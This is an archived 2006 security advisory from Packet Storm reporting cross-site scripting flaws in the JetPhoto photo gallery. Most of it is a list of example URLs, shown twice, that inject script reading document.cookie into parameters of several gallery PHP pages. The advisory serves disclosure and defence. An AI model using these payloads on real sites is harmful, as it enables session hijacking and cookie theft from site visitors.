exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

11.txt

11.txt
Posted Apr 12, 2006
Authored by zeus | Site elitemexico.org

JetPhoto suffers from multiple XSS vulnerabilities.

tags | advisory, vulnerability
SHA-256 | e3c238a7616e388bee872a96391f6527e3f02b129d5f0a36bd1567d28aa00433
Download | Favorite | View

11.txt

Change Mirror Download
------=_Part_14624_21669296.1144720328024
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

###########################################################################
# Advisory #11 Title: JetPhoto Multiple Cross-Site Scripting Vulnerabilitie
#
#
# Author: 0o_zeus_o0 ( Arturo Z. )
# Contact: zeus@diosdelared.com
# Website: www.elitemexico.org
# Date: 10/04/06
# Risk: Medium
# Vendor Url: https://www.jetphotosoft.com
# Affected Software: JetPhoto
# Non Affected:
#
#Info:
##################################################################
#this bug consists of inserting script in the line of execution of
#
#the affected system causing the robbery of cookie
#
#Example XSS:
##################################################################
#
#https://www.vuln.com/[path]/view/Classic.view/thumbnail.php?name=3Dwebalbum=
&page=3D<script>alert(
document.cookie);</script>
#
#https://www.vuln.com/[path]/view/Classic.view/thumbnail.php?name=3DJetPhoto=
_Album&page=3D<script>alert(
document.cookie);</script>
#
#https://www.vuln.com/[path]/view/Classic.view/gallery.php?name=3DJetPhoto_A=
lbum&page=3D<script>alert(
document.cookie);</script>
#
#https://www.vuln.com/[path]/view/Classic.view/detail.php?name=3DJetPhoto_Al=
bum&page=3D<script>alert(
document.cookie);</script>
#
#https://www.vuln.com/[path]/view/Orange.view/slideshow.php?name=3D<script><=
/script><script>alert(
document.cookie);</script>
#
#https://www.vuln.com/[path]/view/Orange.view/detail.php?name=3D1&page=3D<sc=
ript>alert(
document.cookie);</script>
#
#https://www.vuln.com/[path]/view/Orange.view/detail.php?name=3D1&page=3D<sc=
ript>alert(
document.cookie);</script>
#
##################################################################
#
#Solution:
##################################################################
#
#
#VULNERABLE VERSIONS
##################################################################
#all
#
##################################################################
#Contact information
#0o_zeus_o0
#zeus@diosdelared.com
#www.elitemexico.org
##################################################################
#greetz: lady fire,Mi beba, olimpus klan team and elitemexico
#
# original advisorie: https://www.elitemexico.org/11.txt
##################################################################

------=_Part_14624_21669296.1144720328024
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

###########################################################################=
<br># Advisory #11 Title: JetPhoto Multiple Cross-Site Scripting Vulnerabil=
itie<br># <br># <br># Author: 0o_zeus_o0 ( Arturo Z. )<br># Contact: <a hre=
f=3D"mailto:zeus@diosdelared.com">
zeus@diosdelared.com</a><br># Website: <a href=3D"https://www.elitemexico.or=
g">www.elitemexico.org</a><br># Date: 10/04/06<br># Risk: Medium<br># Vendo=
r Url: <a href=3D"https://www.jetphotosoft.com">https://www.jetphotosoft.com<=
/a>
<br># Affected Software: JetPhoto<br># Non Affected: <br>#<br>#Info:<br>###=
###############################################################<br>#this bu=
g consists of inserting script in the line of execution of <br>#<br>#the af=
fected system causing the robbery of cookie
<br>#<br>#Example XSS: <br>################################################=
##################<br>#<br>#https://www.vuln.com/[path]/view/Classic.view/th=
umbnail.php?name=3Dwebalbum&page=3D<script>alert(document.cookie)=
;</script>
<br>#<br>#https://www.vuln.com/[path]/view/Classic.view/thumbnail.php?name=
=3DJetPhoto_Album&page=3D<script>alert(document.cookie);</scri=
pt><br>#<br>#https://www.vuln.com/[path]/view/Classic.view/gallery.php?na=
me=3DJetPhoto_Album&page=3D<script>alert(
document.cookie);</script><br>#<br>#https://www.vuln.com/[path]/view/C=
lassic.view/detail.php?name=3DJetPhoto_Album&page=3D<script>alert=
(document.cookie);</script><br>#<br>#https://www.vuln.com/[path]/view/=
Orange.view/slideshow.php?name=3D<script></script><script&gt=
;alert(
document.cookie);</script><br>#<br>#https://www.vuln.com/[path]/view/O=
range.view/detail.php?name=3D1&page=3D<script>alert(document.cook=
ie);</script><br>#<br>#https://www.vuln.com/[path]/view/Orange.view/de=
tail.php?name=3D1&page=3D<script>alert(
document.cookie);</script><br>#<br>##################################=
################################<br>#<br>#Solution:<br>####################=
##############################################<br>#<br>#<br>#VULNERABLE VER=
SIONS
<br>##################################################################<br>#=
all<br>#<br>###############################################################=
###<br>#Contact information<br>#0o_zeus_o0<br>#zeus@<a href=3D"https://diosd=
elared.com">
diosdelared.com</a><br>#www.elitemexico.org<br>############################=
######################################<br>#greetz: lady fire,Mi beba, olimp=
us klan team and elitemexico<br># <br># original advisorie: <a href=3D"http=
://www.elitemexico.org/11.txt">
https://www.elitemexico.org/11.txt</a><br>##################################=
################################

------=_Part_14624_21669296.1144720328024--

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close